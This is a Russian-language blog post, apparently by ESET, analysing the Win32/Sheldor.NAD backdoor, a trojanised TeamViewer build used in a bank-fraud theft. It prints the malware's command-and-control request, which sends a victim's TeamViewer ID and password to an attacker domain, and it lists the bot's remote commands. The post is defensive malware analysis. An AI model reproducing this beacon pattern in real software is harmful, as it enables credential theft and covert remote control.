Pull to refresh
0

TeamViewer, как компонент бэкдора Win32/Sheldor.NAD

Reading time 2 min
Views 25K
Недавно аналитики ESET обнаружили интересную вредоносную программу – Win32/Sheldor.NAD, которая является модификацией популярного ПО для удаленного администрирования компьютера – TeamViewer.

Данные сведения были получены при проведении экспертизы в рамках расследования инцидента, инициированного Group-IB и связанного с мошенничеством в системах ДБО. При этом злоумышленники умудрились провести несколько поддельных транзакций и похитить около 5 миллионов рублей.

Win32/Sheldor.NAD – устанавливается посредством троянской программы-инсталлятора, которая внедряет в систему модифицированную версию популярного пакета для удаленного администрирования — TeamViewer пятой версии. Причем многие компоненты содержат легальную цифровую подпись:

image

Так как, по сути, в этой модифицированной версии все изменения содержатся в модуле tv.dll, когда мы обнаружили этот backdoor, большинство антивирусных решений его просто не замечало, поскольку без непосредственного анализа кода определить, что это вредоносная программа, было не так просто.

image

Сейчас дела обстоят куда лучше — http://www.virustotal.com/file-scan/report.html?id=9f3ff234d5481da1c00a2466bc83f7bda5fb9a36ebc0b0db821a6dc3669fe4e6-1295272165.

Сразу после установки вредоносной программы происходит запуск серверной части и далее осуществляется непрерывная взаимосвязь с административной панелью злоумышленников, которые могут в любой момент подключиться к зараженному компьютеру и выполнять любые действия с привилегиями пользователя, под учетной записью которого была запущена вредоносная программа или же наблюдать за ним.

image

Информационный обмен между админкой и зараженной машиной в основном заключается в следующем:

GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP/1.1
User-Agent: x3
Host: goeiuyi.net


где поле id=414 034 883 является идентификатором сессии в сети TeamViewer, а pwd=6655 — соответственно паролем. Обладая этими двумя идентификаторами, вы можете беспрепятственно подключаться к удаленному компьютеру из любой точки мира. Назад бот может получать следующие команды из центра управления:

exec — вызывает функцию winapi ShellExecute()
power_off – вызывает функцию winapi ExitWindowsEx() с параметром EWX_POWEROFF
shutdown — вызывает функцию winapi ExitWindowsEx()с параметром EWX_SHUTDOWN
killbot – удаляет все установленные файлы и зачищает созданные ключи реестра

image

Выбор злоумышленников был сделан не случайно именно на программе TeamViewer, так как она достаточно популярна у системных администраторов, и заподозрить подвох можно не сразу. Кроме того, подключение к удаленному компьютеру осуществляется через серверы-посредники для TeamViewer, что позволяет злоумышленникам скрыть свой IP-адрес, с которого реализуется подключение. Это также оставляет меньше улик для проведения расследования, так как запросить необходимые данные у компании-разработчика программы TeamViewer процедура достаточно небыстрая и может затянуться на несколько месяцев.
Tags:
Hubs:
+25
Comments 36
Comments Comments 36

Articles

Information

Website
www.esetnod32.ru
Registered
Founded
Employees
1,001–5,000 employees
Location
Словакия